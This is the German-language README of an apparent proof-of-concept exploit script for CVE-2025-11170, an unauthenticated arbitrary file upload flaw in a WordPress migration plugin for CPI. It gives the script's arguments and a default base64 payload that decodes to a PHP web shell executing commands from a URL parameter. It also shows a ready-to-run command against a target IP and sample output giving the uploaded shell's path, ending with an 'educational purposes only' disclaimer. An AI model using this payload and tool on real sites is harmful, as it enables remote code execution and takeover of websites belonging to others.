
WP-Migrations-Plugin für CPI <= 1.0.2 – Beliebiger Datei-Upload ohne Authentifizierung
WP移行専用プラグイン for CPI <= 1.0.2 - Unaauthentifizierter Upload beliebiger Dateien
Das Plugin WP移行専用プラグイン for CPI für WordPress ist anfällig für das Hochladen beliebiger Dateien, da in allen Versionen bis einschließlich 1.0.2 die Dateityp-Validierung in der Funktion Cpiwm_Import_Controller::import fehlt.
Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf den Server der betroffenen Website hochladen, was möglicherweise die Ausführung von Remote-Code ermöglicht.
CVE-2025-11170.py| Argument | Beschreibung |
|---|---|
-u, --url | Basis-Ziel-URL (z. B. http://target.com/wordpress/). Das Skript hängt wp-admin/admin-ajax.php automatisch an. |
-f, --filename | Name der Shell oder Datei, die hochgeladen werden soll. Standard: shell.php |
-d, --data | Dateiinhalt in Base64 (oder Rohtext). Standard: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Wert des Indexfelds. Standard: 0 |
-H, --headers | Zusätzliche HTTP-Header (Format: X-Key:Value;K2:Value2) |
-t, --timeout | Timeout für HTTP-Anfrage (Sekunden). Standard: 10 |
--retries | Anzahl der Wiederholungsversuche. Standard: 3 |
--backoff | Backoff-Faktor zwischen Wiederholungen (Sekunden). Standard: 0.7 |
-v, --verbose | Erhöht die Ausführlichkeit für Debugging (wiederholbar) |
Nxploited_parse_args
Parst und validiert Eingabeargumente. Stellt die korrekte Endpunktstruktur, Header und Datenkodierung sicher.
Nxploited_logging
Richtet erweitertes Logging und Ausführlichkeit für eine detaillierte oder minimale Laufzeitausgabe ein.
Nxploited_retry_session
Initialisiert eine persistente Sitzung mit Wiederholungs- und Backoff-Logik für eine robuste Kommunikation.
Nxploited_build_payload
Erstellt die POST-Anfrageparameter für den Exploit.
Nxploited_send
Führt die eigentliche POST-Anfrage an den anfälligen Endpunkt aus und verwaltet Antworten/Fehler.
Nxploited_output_result
Verarbeitet und formatiert die Antwort und zeigt bei Erfolg den Shell-Pfad an, andernfalls Debug-Informationen.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Beispielausgabe:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
Dieses Skript wird nur zu Bildungszwecken bereitgestellt.
Die Verwendung dieses Exploits gegen Ziele ohne entsprechende Genehmigung kann illegal sein.
Der Autor übernimmt KEINERLEI Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen.
GitHub: Nxploited
Telegram: KNxploited
Von: Nxploited ( Khaled Alenazi )